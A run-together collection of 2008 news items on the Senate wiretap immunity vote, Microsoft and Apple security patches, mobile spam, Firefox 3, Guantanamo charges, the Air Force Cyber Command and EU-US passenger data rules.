Senator Christopher Bond of Missouri is the top Republican on the Senate Intelligence Committee.

"If we permit lawsuits to go ahead against carriers alleged to have participated in the program, there will be more disclosures in discovery and pleadings of the means of collecting information, disclosing our most vital methods of collecting information," said Senator Bond.

President Bush has vowed to veto any legislation that does not contain the immunity provision. Just hours before final passage, White House spokeswoman Dana Perino signaled the president could back the Senate bill.

"The legislation is shaping up to be one that the president can support," said Dana Perino.

The Senate measure must be reconciled with a House-passed version, which does not include the immunity provision.

The Senate action on the wiretap bill prompted the return to the chamber of two presidential candidates, Democratic Senator Barack Obama of Illinois and Republican Senator John McCain of Arizona. Obama voted against immunity for telephone companies, while McCain voted in favor of keeping the provision in the bill.

Senator Hillary Clinton of New York, the other Senate Democrat running for the White House, did not appear for the vote. Clinton, Obama, and McCain were in the Washington area for Tuesday's primaries in the nation's capital, Maryland and Virginia.

Microsoft released 11 patches on Tuesday to fix vulnerabilities in its software, including three critical flaws in the company's flagship Web browser, Internet Explorer 7.

The three critical security holes in Internet Explorer include memory corruption issues in the browser's HTML rendering capabilities for certain layouts, the handling of a property method, and the browser's processing of arguments when processing images. Microsoft rated all three flaws Critical, it's highest severity rating, for Internet Explorer 7 running on both Windows XP Service Pack 2 systems and Windows Vista systems. A fourth flaw fixed by the patch is rated Important on the most common versions of Windows.

"Today's Microsoft patches underline the need to be aware when opening files and the risk of surfing the Web unprotected," Craig Schmugar, a threat researcher at McAfee Avert Labs, said in a statement discussing the patches. "Many of the vulnerabilities addressed by the fixes could be exploited if a Windows user simply opens a file or visits a malicious or compromised Web site, favorite attack methods among cybercriminals.”

Microsoft's other Critical-rated bulletins include four patches for security issues in Microsoft's Office productivity suite and a patch to close a serious security hole in a component of Microsoft Windows that handles Web Distributed Authoring and Versioning (WebDAV) file commands.

The updates, published by Microsoft on its regularly scheduled patch day, bring the total number of flaws fixed by the company to 20 for the year. In January, the company issued a two bulletins to fix three flaws. Last year, the software giant released 69 bulletins. A report issued by IBM's Internet Security Systems found that fewer software vulnerabilities were disclosed in 2007 as compared to 2006, the first time that ISS's tally has declined.

Microsoft rated five of the patches "Important," its second highest severity rating, fixing issues in the file conversion feature of Microsoft Works and Microsoft Office as well as two vulnerabilities in Microsoft's Internet Information Services (IIS) Web server software, a flaw in Microsoft's ActiveDirectory software, and a security issue in the way Windows handles TCP/IP packets.

Mobile operators are being warned to brace themselves for a global upsurge in mobile messaging abuse.

The growth of mobile messaging, reductions in message delivery costs, inherent network vulnerabilities, and new mobile marketing initiatives are converging to create a perfect storm for abuse, according to mobile security firm Cloudmark. It reports mobile spam is becoming a growing problem.

China and Southeast Asia are at the leading edge of the problem, partly due to low costs in sending and receiving text messages. In China, the average subscriber receives between six and 10 mobile spam messages per day.

Meanwhile, in India some operators face spam levels of about 30 per cent, even after protocol-level filtering. Levels of spam in Japan are likely to increase as operators open their networks to email-to-SMS and MMS services, Cloudmark warns.

Attackers are applying techniques familiar to those at the receiving end of conventional email spam to the medium. For example, spammers are impersonating other mobile phone numbers and networks to send out spam using SMS spoofing techniques. Unregistered pre-paid SIM cards are also being used to distribute mobile junk messages.

Mobile spam started out as an unscrupulous medium for material ranging from mortgage offers to pornographic messages. It is increasingly being used to scam prospective marks into calling premium rate numbers, texting premium rate short codes, or entering personal information into a phishing site. The increased prevalence of money making rackets has resulted in growing complaints to operators from customers who had previously ignored mobile spam.

As well as copping an earful of abuse over the problem, operators are also being left out of pocket. SMS faking and spoofing attacks from off-network sources cost operators hundreds of thousands of dollars each month in inter-carrier roaming and connection charges, according to Cloudmark.

It reports that government regulators across Asia are stepping in to mandate that mobile operators exercise greater control over mobile spam by making sure customers' complaints are acted upon and to insist on registration of pre-paid mobile SIMs.

Once upon a time in America

Over in the US, email to mobile attacks are dominant. Text messaging via the internet provides a cost-effective platform for miscreants to reach mobile subscribers. While numerically insignificant targets in the past, emails associated with mobile numbers are now showing up on the radar of spammers and phishers.

One in four messages sent to mobile devices via email in North America are made up of spam, according to figures from Cloudmark's mobile operator clients in the region. Mobile spam can drive up resource utilisation and customer complaints. Adding insults to injury, victims of mobile spam in the US are often charged for receiving junk SMS messages, making them more likely to complain and ask for credits from their carrier.

To date, mobile spam attacks in the US have taken the form of unsolicited advertising. However it's probably only a matter of time before scammers get in on the act, as they've already done in Europe.
Safe European home

In Europe, mobile operators' "walled garden" strategies have limited the amount of third-party content from reaching mobile users. This, combined with the relatively high cost of sending SMS messages, has limited (but not eliminated) attacks.

Low-volume, high-value attacks involving phishing and premium rate phone numbers predominate in Europe. SMS flooding — denial of service (DDos) attacks in which large volumes of SMS spam are sent during short time intervals - are also a problem in the region.

Cloudmark reckons so-called vishing attacks that combine the use of VoIP networks with conventional email phishing scams will become a growing problem for mobile subscribers this year. It warns that mobile network abuse can tarnish an operators' brand and lead to increased support costs and customer churn as some customers react to being deluged by garbage by switching networks.

Worse still, mobile abuse may undermine operator attempts to introduce revenue-producing services.

"The growth in mobile messaging abuse is exposing operators to additional and unnecessary costs at a time when they are turning to messaging and mobile advertising to open up new revenue streams," said Jamie de Guerre, chief technology officer at Cloudmark.

"For mobile operators, the greatest risk is that subscribers' zero tolerance attitude towards intrusive mobile spam will prompt them to change providers or opt out of mobile advertising and marketing opportunities, leaving much needed new revenue streams fatally crippled from the outset."

Cloudmark, a provider in the emerging mobile security space, advises mobile operators to take be proactive in protecting their subscribers rather than taking a wait and see approach to possible security problems

Mozilla launched the third beta of its Firefox 3 browser Tuesday night with enhanced security features.

Firefox 3 Beta 3 contains more than 1,300 changes from the second beta to improve performance. Meanwhile, Mozilla improved some of the security features in Firefox 3 Beta 3. Among the notable items detailed in Mozilla’s release notes:

* Improved one-click site information: Mozilla says you can click on a site’s favicon in the location bar to wee who owns the site and whether the connection is secure. Identity verification is also easer to use.
* Malware protection: Firefox 3 Beta 3 includes malware protection that warns users when they get to sites that are known to deliver malicious payloads.
* Add-on updates. Firefox will disable add-ons that update in an “insecure manor.” This feature could cut down on some of the flat file vulnerability issues of late.
* Vista parental controls: Firefox 3 now is compatible with Vista’s control settings to disable file downloads.
* Anti-virus integration: Firefox 3 will inform antivirus software when downloading executables.

And there are other features, but the big picture is this: Mozilla recognizes that browsers are often the weak security link. As a result Mozilla is building in more features to plug-and-play with existing security software. It may not be a stretch to predict that many security features in existing suites will be built into future browsers.

Apple today released 11 security updates for Mac OS X, with many of the updates specific to the newly-released Leopard operating system. The Security Update 2008-001 is the first from Apple for 2008. The applications affected include Time Machine, Mail, and Parental Controls. The update can be downloaded and installed via Software Update preferences, or from Apple Downloads.

Directory Services
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11 and addresses the vulnerability in CVE-2007-0355. Apple says, "A stack buffer overflow exists in the Service Location Protocol (SLP) daemon, which may allow a local user to execute arbitrary code with system privileges." Apple credits Kevin Finisterre of Netragard for reporting this vulnerability.

Foundation
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0035. An affected user accessing a maliciously crafted URL may experience an application termination or arbitrary code execution. A memory corruption issue exists in Safari's handling of URLs. By enticing a user to access a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. Apple notes that this issue does not affect systems prior to Mac OS X v10.5.

Launch Services
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0038. A removed application may still be launched via the Time Machine backup. Apple says, "Launch Services is an API to open applications or their document files or URLs in a way similar to the Finder or the Dock. Users expect that uninstalling an application from their system will prevent it from being launched. However, when an application has been uninstalled from the system, Launch Services may allow it to be launched if it is present in a Time Machine backup." Apple credits Steven Fisher of Discovery Software and Ian Coutier for reporting this vulnerability.

Mail
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11 and addresses the vulnerability in CVE-2008-0039. Affected users accessing a URL in a message may experience an arbitrary code execution. Apple says, "An implementation issue exists in Mail's handling of file:// URLs, which may allow arbitrary applications to be launched without warning when a user clicks a URL in a message. This issue does not affect systems running Mac OS X v10.5 or later.

NFS
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0040. A remote attacker may cause an unexpected system shutdown or arbitrary code execution if the system is being used as an NFS client or server. Apple says, "A memory corruption issue exists in NFS' handling of mbuf chains. If the system is being used as an NFS client or server, a malicious NFS server or client may be able to cause an unexpected system shutdown or arbitrary code execution." This issue does not affect systems running Mac OS X v10.5 or later. Apple credits Oleg Drokin of Sun Microsystems for reporting this issue.

Open Directory
This patch affects users of Mac OS X v10.4.11 and Mac OS X v10.4.11 Server. No CVE number is given. An affected user may find that NTLM authentication requests may always fail. Apple says, "This update addresses a non-security issue introduced in Mac OS X v10.4.11. An race condition in Open Directory's Active Directory plug-in may terminate the operation of winbindd, causing NTLM authentications to fail. This issue only affects Mac OS X v10.4.11 systems configured for use with Active Directory."

Parental Controls
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0041. Affected users may find that requesting to unblock a Web site leads to information disclosure. Apple says, "When set to manage Web content, Parental Controls will inadvertently contact www.apple.com when a Web site is unblocked. This allows a remote user to detect the machines running Parental Controls." Apple credits Jesse Pearson for reporting this issue.

Samba
This patch affects users of Mac OS X v10.4.11, v10.5, and v10.5.1 and Mac OS X Server v10.4.11, v10.5, and v10.5.1. The patch addresses the vulnerability in CVE-2007-6015. A remote attacker may cause an unexpected application termination or arbitrary code execution. Apple says, "A stack buffer overflow may occur in Samba when processing certain NetBIOS Name Service requests. If a system is explicitly configured to allow 'domain logons,' an unexpected application termination or arbitrary code execution could occur when processing a request. Mac OS X Server systems configured as domain controllers are also affected." Apple credits Alin Rad Pop of Secunia Research for reporting this issue.

Terminal
This patch affects users of Mac OS X v10.4.11, v10.5, and v10.5.1 and Mac OS X Server v10.4.11, v10.5, and v10.5.1. The update addresses the vulnerability in CVE-2008-0042. Affected users viewing a maliciously crafted Web page may experience arbitrary code execution. Apple says, "An input validation issue exists in the processing of URL schemes handled by Terminal.app. By enticing a user to visit a maliciously crafted Web page, an attacker may cause an application to be launched with controlled command line arguments, which may lead to arbitrary code execution." Apple credits Olli Leppanen of Digital Film Finland and Brian Mastenbrook for reporting this issue.

X11
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2007-4568. Apple says, "Multiple vulnerabilities in X11 X Font Server (XFS), the most serious of which may lead to arbitrary code execution."

X11
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0037. An affected user may find that changing the settings in the Security Preferences Panel has no effect. Apple says, "The X11 server is not reading correctly its 'Allow connections from network client' preference, which can cause the X11 server to allow connections from network clients, even when the preference is turned off." This issue does not affect systems prior to Mac OS X v10.5.

I don’t want to start a debate here over who invented anti-virus. According to DarkReading it is Peter Tippett.(see the recent debate over who invented the firewall here. Is Dark Reading going to also knight the inventor of malware if they can track him down?)

In a speech last week Tippett made some great points. Here is my favorite:

For example, today’s security industry focuses way too much time on vulnerability research, testing, and patching, Tippett suggested. “Only 3 percent of the vulnerabilities that are discovered are ever exploited,” he said. “Yet there is huge amount of attention given to vulnerability disclosure, patch management, and so forth.”

But Tippett has his own problems in understanding the state of IT security. He also states:

Security awareness programs also offer a high rate of return, Tippett said. “Employee training sometimes gets a bad rap because it doesn’t alter the behavior of every employee who takes it,” he said. “But if I can reduce the number of security incidents by 30 percent through a $10,000 security awareness program, doesn’t that make more sense than spending $1 million on an antivirus upgrade that only reduces incidents by 2 percent?”

That’s a lot of “ifs” there Peter. I would rather spend $100K on an authentication program that does not require user defined passwords than $10,000 every year for ever trying to get my users to stop using “Pistons”, “Patriots”, or “Redwings” as their passwords.

Security awareness training for end users is a complete waste of time and money. Save your money for real security solutions that solve real deficiencies in your defenses.

A JOURNALIST at ZDnet has discovered that Microsoft's Windows Vista with Service Pack 1 (SP1) applied still has crackable Windows Genuine Advantage (WGA) activation.

Over the weekend, Adrian Kingsley-Hughes posted up the following bog entry:

"It does seem that Microsoft hasn’t been successful in closing off all the hacks that allow non-genuine copies of Vista SP1 to pass off as genuine ones. After a few minutes of searching the darker corners of the Internet and a few seconds in the Command Prompt I was able to fool Windows into thinking that it was genuine, turning this:

[image of Windows Vista status -- License Status: Notification]

"... into this:

[image of Windows Vista status -- License Status: Licensed]

"Close, but no cigar."

Indeed. Kingsley-Hughes also wrote that the "hack" (sic) is not complicated, but just a matter of "download, run, wait a few seconds, reboot, done," in his words.

So much for the quality of code demonstrated in the Vole's Windows Vista SP1.

The Pentagon has announced charges against six Guantanamo Bay prisoners over their alleged involvement in the 11 September 2001 attacks in the US.

Prosecutors will seek the death penalty for the six, who include alleged plot mastermind Khalid Sheikh Mohammed.

The charges, the first for Guantanamo inmates directly related to 9/11, are expected to be heard by a controversial military tribunal system.

About 3,000 people died in the hijacked plane attacks.

The Guantanamo Bay detention centre, in south-east Cuba, began to receive US military prisoners in January 2002. Hundreds have been released without charge but about 275 remain and the US hopes to try about 80.

Tribunal process

Brig Gen Thomas Hartmann, a legal adviser to the head of the Pentagon's Office of Military Commissions, said the charges alleged a "long-term, highly sophisticated plan by al-Qaeda to attack the US".

He said there would be "no secret trials" and that they would be "as completely open as possible".

"Relatively little amounts of evidence will be classified," Gen Hartmann said.

The other five defendants are Ramzi Binalshibh, a Yemeni, Walid Bin Attash, also from Yemen, Ali Abd al-Aziz Ali, who was born in Balochistan, Pakistan, and raised in Kuwait, Mustafa Ahmad al-Hawsawi, a Saudi, and Mohammed al-Qahtani.

Gen Hartmann said the charges included conspiracy, murder in violation of the laws of war, attacking civilians, destruction of property and terrorism.

All but Mr Qahtani and Mr Hawsawi are also charged with hijacking or hazarding an aircraft.

The charges listed "169 overt acts allegedly committed by the defendants in furtherance of the September 11 events".

Gen Hartmann said: "The accused will have his opportunity to have his day in court.

"It's our obligation to move the process forward, to give these people their rights."

He said they would be given military and civilian defence lawyers and would have the right of appeal.

In listing more details of the charges against the defendants, Gen Hartmann alleged that Khalid Sheikh Mohammed had proposed the attacks to al-Qaeda leader Osama Bin Laden in 1996, had obtained funding and overseen the operation and the training of hijackers in Afghanistan and Pakistan.

Khalid Sheikh Mohammed, a Kuwaiti of Pakistani extraction, was said to have been al-Qaeda's third in command when he was captured in Pakistan in March 2003.

He has reportedly admitted to decapitating kidnapped US journalist Daniel Pearl in 2002 but these charges do not relate to that.

The BBC's Vincent Dowd in Washington says Khalid Sheikh Mohammed has said he planned every part of the 9/11 attacks but that his confession may prove problematic as the CIA admitted using controversial "waterboarding" techniques.

Human rights groups regard the procedure as torture.

US Homeland Security Secretary Michael Chertoff told the BBC the trials would be fair.

Asked if evidence obtained from waterboarding - a controversial interrogation technique that simulates drowning - would be used, he said: "The judges will decide what's reasonably admissible and what's not admissible."

Legal challenge

The charges will now be sent to Susan Crawford, the convening authority for the military commissions, to determine whether they will be referred to trial.

Any trials would be held by military tribunal under the terms of the Military Commissions Act, passed by the US Congress in 2006.

The Act set up tribunals to try terror suspects who were not US citizens.

The law is being challenged by two prisoners at Guantanamo Bay, who say they are being deprived of their rights to have their cases heard by a US civilian court.

Responding to the new charges, a representative of Mohammed al-Qahtani said they would create "show trials".

Centre for Constitutional Rights in New York executive director Vincent Warren said: "These trials will be using evidence obtained by torture as a means to convict someone and execute them and that is absolutely abhorrent to what we believe in here in America.''

Nineteen men hijacked four planes in the 9/11 attacks. Two planes hit the World Trade Center in New York, another the Pentagon in Washington and the fourth crashed in Pennsylvania.

BARKSDALE AIR FORCE BASE, Louisiana -- When a reporter enters the Air Force office of William Lord, a smile comes quickly to the two-star general's face as he darts from behind his immaculate desk to shake hands. Then, as an afterthought, he steps back and shuts his laptop as though holstering a sidearm.

Lord, boyish and enthusiastic, is a new kind of Air Force warrior -- the provisional chief of the service's first new major command since the early 1990s, the Cyber Command. With thousands of posts and enough bandwidth to choke a horse, the Cyber Command is dedicated to the proposition that the next war will be fought in the electromagnetic spectrum, and that computers are military weapons. In a windowless building across the base, Lord's cyber warriors are already perched 24 hours a day before banks of monitors, scanning Air Force networks for signs of hostile incursion.

"We have to change the way we think about warriors of the future," Lord enthuses, raising his jaw while a B-52 traces the sky outside his windows. "So if they can't run three miles with a pack on their backs but they can shut down a SCADA system, we need to have a culture where they fit in."

But before Lord and his geek warriors can settle in for the wars of the future, the general has to survive a battle of a decidedly different nature: a political and cultural tug of war over where the Cyber Command will set up its permanent headquarters. And that, for Lord and the Air Force, is where things get trickier than a Chinese Trojan horse.

With billions of dollars in contracts and millions in local spending on the line, 15 military towns from Hampton, Virginia, to Yuba City, California, are vying to win the Cyber Command, throwing in offers of land, academic and research tie-ins, and, in one case, an $11 million building with a moat. At a time when Cold War-era commands laden with aging aircraft are shriveling, the nascent Cyber Command is universally seen as a future-proof bet for expansion, in an era etched with portents of cyberwar.
Russian Hackers and Chinese Cyberspies

The news is everywhere. When Russian hackers were blamed for a wave of denial-of-service attacks against Estonian websites last spring, President Bush voiced concern that the United States would face the same risk. The national intelligence director, Michael McConnell, recently claimed a computer attack against a single U.S. bank could cause more economic harm than 9/11, and called for more National Security Agency surveillance of the internet. A CIA official followed up with a tale about cyber attackers causing multi-city power failures overseas. Some in the military believe Chinese cyberspies have already penetrated unclassified Pentagon computers.

Where buzz flows, money follows, and the investment in info-war comes as the Air Force cuts back personnel elsewhere to fund new aircraft: The service just finished phasing out 20,000 enlisted men and women, with plans to dump 20,000 more by 2011. The effect of military cutbacks on the surrounding communities can be devastating. "If you gain or lose a unit in a place where the military is already a major employer, it has a huge impact," says Chris Erickson, a New Mexico State University professor.

Unofficial estimates say 10,000 military and ancillary jobs could clump around the 500 posts at the Cyber Command's permanent headquarters. The governors of California, New Mexico and Louisiana are pitching their locales directly to the secretary of the Air Force. In December, Louisiana governor Bobby Jindal took advantage of a meeting with President Bush on Katrina recovery to lobby for the Cyber Command. A dozen congressional delegations have weighed in as well. Lord is feeling the heat.

"Oh Lord," the general sighs, "there's congressional pressure."
Location, Location, Location

"It would sure be nice to have it here," says Tammy Frank, manager of the Waffle House in Bossier, Louisiana, outside Barksdale's gates. She pushes her hair behind her ears and leans on the cash register. "My (preteen) son is into computers, and it will be easier for him to find a good job and stay here."

The Cyber Command was provisionally established on Barksdale's 22,000 acres in October, at the edge of a black lake stitched with swamp trees that narrow just above the water line. The placement was good news for Bossier, which took it as a sign that Louisiana would win the permanent command, too.

A military town for generations, this sprawling suburb-opolis has about 58,000 residents, including 7,000 active-duty and reserve personnel. Across the Red River in Shreveport, downtown buildings are crumbling and half-abandoned -- but Bossier is thriving. Now realtors are touting proximity to the Cyber Command as a selling point for houses, while local residents hope permanent placement will boost the local economy, and perhaps even infuse the town with high-tech esprit.

To persuade the Air Force of Bossier's potential as a Deep South Silicon Valley, city officials broke ground last month on a "Cyber Innovation Center," a $100 million office complex abutting Barksdale. The consortium paid $4.7 million for a 64-acre parcel, and they've raised $50 million from state and local government and another $50 million from the federal government for a complex of buildings, starting with an $11 million, 120,000-square-foot cyberfortress. Renderings show a moat and huge, silvery wedges of metal jutting outward from the building's base. There's a jet in the design, pointed toward the sky.
Built-In Force Protection

"The building has force protection designed into it," says Craig Spohn, who's heading the development. "It can withstand a multitude of attacks."

Spohn ambles with a limp across a newly cleared patch of an old pecan grove that will house the gleaming redoubt. The trees remaining on the land are leafless in the bright winter haze, and a B-52 floats through the sky beyond, headed for the strip at Barksdale. The sight of the 47-year old planes coming and going is so common here that only out-of-town visitors and aviation enthusiasts still stare at them.

Spohn follows it with his eyes. A lanky, gray-haired man in a nice suit, Spohn came back to work directly from arthroscopic knee surgery, and shows off fresh stitches in three holes on his left knee. He has personal reasons for wanting to win the Cyber Command. "My dad is retired Air Force," he says. "I moved wet and warm to Barksdale, and I love it here. There were no jobs for me when I left. And I eventually returned with a job working for SAIC.

"There are a lot of us who want to come back," he adds.
"Tell the Nation That the Age of Cyberwarfare Is Here"

The Cyber Command is rooted in a historic vision statement penned in 2005 by the secretary of the Air Force, Michael Wynne, and co-signed by the Air Force chief of staff. In the 21st century, Wynne wrote, America's enemies would contest America in a new range of theaters, and the armed forces must be ready to meet them and, if necessary, "destroy them" there. Henceforth, he vowed, the Air Force would "fly and fight in air, space and cyberspace."

"Tell the nation," Wynne reiterated in a speech last September, "that the age of cyberwarfare is here."

"Our mission is to control cyberspace both for attacks and defense," says Lord's boss, Lt. Gen. Robert Elder -- a three-star general who totes a Blackberry and holds a Ph.D. in electrical engineering. Wearing a green flight suit with no brass, bars or Bronze Star in sight, Elder relaxes in a leather chair away from his desk, and lays out the vision, which amounts to nothing less than a complete transformation of the Air Force.

"We have to learn to plan years out for operations, security defense and integration, to plan how to deter attacks, how to posture to prevent attacks, and we have to stay very current," Elder says.

The new command, only the 10th in Air Force history, means a single leadership for a number of pieces already in place under different wings. Cyber warriors are already being trained at Hurlburt Air Force Base in Florida, while Lackland Air Force Base in San Antonio holds the defense portion. Predator reconnaissance UAVs are flown out of Nevada, and Offutt Air Force Base in Nebraska has a cluster of information and intelligence wings.

No one knows how many people will ultimately be incorporated into the Cyber Command. The Air Force's other nine commands range in size from slightly over 14,000 personnel in the Special Ops Command to 167,000 in the Air Combat Command. A recent Network World article, quoting Elder, reports the Cyber Command will have 5,000 to 10,000 people. But the Air Force now disavows that number, confirming only that about 500 airmen and airwomen will be stationed at the Cyber Command headquarters itself.
Unified Command, Single Commander

The important thing, the Air Force says, is that under a unified command, decisions about how to use all the pieces -- and control of the budget, more than $2 billion the first year -- will be in the hands of a single commander instead of being spread out as they are now.

"It makes us nimble," says Elder. "It means we can react quickly to change." But, he cautions, there's no plan to consolidate all those pieces in one location. Such a move would run counter to Air Force policies of decentralized commands.

Not everyone is enthusiastic about the reorganization. Defense expert John Pike, director of GlobalSecurity.org, says the Cyber Command's mission is murky. "There's been so much gee-whiz flackery to this," Pike says. "They've got the whole thing tarted up, and it's hard to tell what they're actually doing."

Pike says the Cyber Command may be part of a secret Air Force plan to prepare for war against China, already suspected of trying to hack Department of Defense networks. He says the new command's defensive mission is muddled and duplicative: The NSA already defends military networks. As for civilian infrastructures like the internet and power grid, they're privately owned, and the Air Force has no jurisdiction over them.

Lord concedes that the Air Force can't do much on its own to protect civilian systems. "We're worrying about the ability of someone to interrupt Wall Street and crash the economy," he says. "We're having a hard time getting Wall Street to work with us."

On the offensive side, though, everything is on the table, from jamming an enemy's radar to infiltrating its command-and-control networks. Someday, the Cyber Command may be able to hack an enemy's security and radar systems, improving the chances of bombs hitting home.

"It's the entire electromagnetic spectrum," says Lord. "Many of the elements that form (Cyber Command) come from our communications and intel operations. The internet is obviously part, but it also includes things like cellphone frequencies, high-power microwaves and directed-energy components.

"What if we could spoof the enemy, to get them to operate on a set of assumptions by altering their data?" Lord asks. "We talk about being able to change the enemy's behavior without a kinetic application. Weapons of mass disruption."
Cold War Sites Compete for the Code War

When the Cyber Command was formally announced in September, the competition began immediately. Rural Yuba City, California -- the home of Beale Air Force Base -- rounded up 53 signatures from the state's congressional delegation, including Sen. Dianne Feinstein, to try to plant the Cyber Command on California's fertile soil. In a newspaper interview, community leader Ron Bartoli touted Yuba's access to Silicon Valley, which lies about 170 miles away, and argued that cyberwarfare is consistent with Golden State values. "It's computers, it's green, it's everything California says they want."

Eight hundred miles away in San Antonio, U.S. Rep. Ciro Rodriguez (D-Texas) was explaining the high-tech acumen of his community. "The robust cyber-security research community in San Antonio has transformed the Alamo City into a national leader on the subject," he said in a statement. In the Rockies, Colorado Springs came late to the party, but offered the coolest location: inside Cheyenne Mountain, which once served as headquarters of the North American Aerospace Defense Command (NORAD), but is now used mostly for training.

In the heartland, architecture students at the University of Nebraska-Lincoln held an exhibition to come up with potential building designs for the Cyber Command, producing 13 detailed drawings resembling bunkers, platforms and a burnished black wedge. "I believe the ... proposals may play a provocative role in the future planning of such a free-standing facility," architecture professor Chris Ford said in a press release.

Nebraska has long held a unique post in America's defensive footing, and it's mounting a particularly hungry bid for the Cyber Command. In 1948, Offutt Air Force Base was selected for the headquarters of the Strategic Air Command, the linchpin of America's nuclear strategy. Square in the middle of the North American continent, the site was out of reach of existing bombers and missiles.

Now called the U.S. Strategic Command, the drab, concrete headquarters building still anchors Offutt to the nuclear era, with three above-ground floors and four more underground housing a 14,000-square-foot command center that directs all U.S. nuclear forces. It's designed with its own power generator and food supply, so it can be sealed off in the event of a nuclear attack.

Comparisons between nuclear and cyberweapons might seem strained, but there's at least one commonality. Scholars exploring the ethics of wielding logic bombs, Trojan horses, worms and bots in wartime often find themselves treading on ground tilled by an earlier generation of Cold War nuclear gamesmen.

"There are lots of unknowns with a cyberattack," says Neil Rowe, a professor at the Center for Information Security Research at the U.S. Naval Postgraduate School, who rejects cyberattacks as a legitimate tool of war. "The potential for collateral damage is worse than nuclear technology.... With cyber, it can spread through the civilian infrastructure and affect far more civilians."
No Geographic Edge

But ethical concerns aren't weighing down the rainmakers wooing the Cyber Command; they're more concerned with local families and future investment. And without the geographic edge that landed the Strategic Air Command in their backyard a half-century ago, community leaders in Omaha and nearby Bellevue are finding new ways to tempt the decision makers in Washington.

"We've offered a package that includes land, facilities, and a demographic of strong academics and industrial consortium," says Megan Lucas, president of the Bellevue Chamber of Commerce. "We have the infrastructure, dual power grids and dark fiber."

Lucas is a key organizer in the region's yearlong campaign to land the Cyber Command at Offutt. Smart and straightforward, Lucas is so well-known among Offutt staff that they keep track of her schedule, and when the previous base commander, then-Brig. Gen. T. C. Jones, left Offutt, he designated her his honorary wingman. A photo of Lucas in her black-leather bomber jacket hangs outside the headquarters office.

Lucas and other local leaders persuaded the Omaha Development Foundation to put together a purchase of 136 acres of snow-crunched land immediately south of the base for expansion. Bellevue's entire economic engine and its community are wrapped around Offutt, she says. Nearly half the people in the town of 49,000 are active-duty or retired military.

Talk of the Cyber Command has gotten around in Bellevue. In the lounge at the Leopard Lanes bowling alley, a Desert Storm veteran named Jim Chappell runs the karaoke machine on weekends. He says he's heard about the competition. "Maybe Offutt will get it, they're wired for it," he says, lighting a cigarette with his father's Zippo. "That's how dealing with the government is. You have to spend money to attract it. But there's plenty of money and work here either way.

"It's all political, where they decide to put it," says Lucas. "We're clearly the best situated and equipped. But that doesn't mean we'll get it."
"We Are Our Own Worst Enemy"

Inside the Air Force Network Operations Center at Barksdale, a tan, windowless building in the northwest corner of the base, the cyberwar is in full pitch. But the internet jihadists and Chinese hacker troops the Cyber Command is expecting so far haven't materialized. Spammers are the enemy today.

Airmen and women sit at rows of computer tables staring at Dell-branded LCD monitors. On one wall, a huge screen is slashed into quadrants with maps and coordinates, while in the next room, more personnel watch a similar display showing sports and news channels.

"Because you're here, we've put this up instead of the classified information that was up there," Lt. Col. Ken Vantiger says. "As soon as you leave, we'll go back to classified operations.

Capt. Scott Hinck, crew commander at the center, works the defensive side of the room, monitoring what's being done at Barksdale, and what's coming in from Lackland. He says it's pretty clear where their greatest vulnerability lies. "We are our own worst enemy," Hinck says. "Our network connects more than a million Air Force users, and you can only do so much to secure your software."

Air Force users are forbidden, both by direct order and by a government firewall, from using Hotmail, Yahoo, Gmail, Facebook, MySpace, Flickr and dozens of other sites, Hinck says. "Social network sites are such a security liability, not just for attacks, but for the information people post about themselves.... We have direct evidence (correlating) the release of information to responsive attacks and changes in the enemy's strategies."

Even with the restrictions, Air Force network users still get plenty of attacks from phishers, malicious e-mail and hostile "Click Here" links, Hinck says. "We fended off eight attacks in the last hour."
Hoping For Too Much?

It's a heady time for the Cyber Command. The Air Force just graduated its first group of electronic warriors in December from a 38-day training program at Hurlburt Air Force Base in Florida. The graduates came from both officer and enlisted ranks, according to 1st Lt. Ashley Connor, a spokeswoman with the base.

Cyber warriors first train with the 229th Information Operations Squadron in Vermont, then come to Hurlburt for further training with the 39th Information Operations Squadron. Hurlburt expects to graduate about a hundred warriors a year, Connor says.

With the troops arriving, Lord has a tight deadline to get the new command headquarters running at its permanent location by October 2008, with the operation fully established by 2009. The short list of top contenders for the Cyber Command is expected from the secretary of the Air Force in February, and the Air Force brass is watching the heated battle with a mix of awe and dismay.

"All the locations came forward on their own," says Ed Gulick, spokesman for the secretary of the Air Force. "The Air Force has not solicited them."

Lord's boss, Elder, says he appreciates the efforts of the communities competing for the command, but he's concerned that they're expecting too much from it. "This will be a good deal for the community where it is set up," he says. "It will attract contractor presence. But not an industry -- manufacturing jobs."

"I worry that they are looking at this as the opposite of BRAC," Elder adds, referring to the Base Realignment and Closure process that's mostly shrinking bases and chipping into base-reliant communities. "It's not going to be on that scale."

Windfall or not, Barksdale-booster Spohn is confident that his community will prevail in the ersatz cyberwar. He even has plans to build an additional 380,000 square feet of offices to house educational, research and manufacturing operations near the base. While everyone is taciturn publicly, he's convinced he's seen winks and nods from Air Force bigwigs.

"In as many ways as they can tell us they're committed, they've told us," Spohn says. Lapsing into military-speak, he adds, "My confidence is high."

EU officials are crying foul over Department of Homeland Security attempts to impose draconian and invasive data requirements on passengers travelling to the US. The US demands, however, are remarkably similar to the ones the EU itself proposes to make of passengers travelling to Europe, making the officials shouting "blackmail" and "troublesome" somewhat unlikely guardians of the citizenry's freedoms.

The problem for Brussels, essentially, is not that the DHS is making the requirements but that it's making them without giving Brussels enough of a chance to play too, and it's striking deals with individual member states. DHS officials are said to be circulating a ten page memorandum of understanding to EU member states which do not currently qualify for the US Visa Waiver Programme (these are mainly Eastern European new-entrants), but which could achieve visa-free travel under the new-look system if they'll just sign here.

